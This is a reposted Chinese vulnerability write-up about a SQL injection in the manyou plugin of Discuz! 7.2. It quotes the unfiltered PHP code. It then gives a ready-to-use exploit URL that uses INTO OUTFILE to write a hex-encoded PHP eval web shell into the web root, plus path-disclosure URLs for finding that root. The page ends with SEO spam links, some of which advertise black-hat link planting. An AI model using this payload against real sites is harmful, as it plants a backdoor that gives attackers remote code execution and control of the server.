Discuz! 7.2 注入漏洞分析与利用
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Discuz! 7.2 注入漏洞分析与利用
在最新的discuz! 7.2中自带了一个新的应用程序插件manyou。恰恰在这个新
插件中,没有对传入的参数进行检查,在GPC为off的情况下,导致注入漏洞的产生。
漏洞分析:
文件./manyou/sources/notice.php
相关代码:
if($option == 'del') {
$appid = intval($_GET['appid']);
$db->query("DELETE FROM {$tablepre}myinvite WHERE appid='$appid' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite'); } elseif($option == 'deluserapp') {
$hash = trim($_GET['hash']); //此处并没有进行过滤,直接导致注入的产生
if($action == 'invite') {
$query = $db->query("SELECT * FROM {$tablepre}myinvite WHERE
hash='$hash' AND touid='$discuz_uid'");
if($value = $db->fetch_array($query)) {
$db->query("DELETE FROM {$tablepre}myinvite WHERE hash='$hash' AND touid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice&action=invite'); } else {
showmessage('manyou:noperm');
}
} else {
$db->query("DELETE FROM {$tablepre}mynotice WHERE id='$hash' AND
uid='$discuz_uid'");
showmessage('manyou:done', 'userapp.php?script=notice');
}
}
很简单的一个漏洞。在没有查询结果返回的情况下我们往往只有采取盲注的方式,但如果当前数据库帐号有File_priv的话我们也可以直接into outfile。
/userapp.php?script=notice&view=all&option=deluserapp&action=invite&h ash=' union select
NULL,NULL,NULL,NULL,0x3C3F70687020406576616C28245F504F53545B274F275D2 93B3F3E,NULL,NULL,NULL,NULL into outfile
'C:/inetpub/wwwroot/shell.php'%23
0x3C3F70687020406576616C28245F504F53545B274F275D293B3F3E是
的十六进制表示。
但想直接into outfile的话,我们还得有web的物理路径,这在php的情况下并不难得到。
/manyou/admincp.php?my_suffix=%0A%0DTOBY57
/manyou/userapp.php?%0D%0A=TOBY57
这样就万事具备,只差outfile了。
济宁SEO推荐文章:
济宁SEO教你通过网站优化赚钱什么是linkwheel?济宁SEO带你认
识linkwheel
济宁SEO谷歌排名第一位济宁SEO分享一篇不错的文章,不看后悔!
SEO知识摸底检验网站优化常用的SEO推广技巧
什么是静态 URL 或动态 URL?网站SEO优化的目的
js弹窗转向被搜索引擎定性为作弊如何看待做黑链的网站?
做黑链的优势和劣势网站被挂了木马和黑链怎么办?
济宁SEO给新人站长的一点建议!企业网站优化成功案例分析
黑帽SEO如何挂黑链,挂黑链方法总结Discuz! 7.2 注入漏洞分析与利用
dede5.5最新漏洞利用图解网站优化之浅谈SEO
济宁SEO随着外链增多网站排名逐渐上升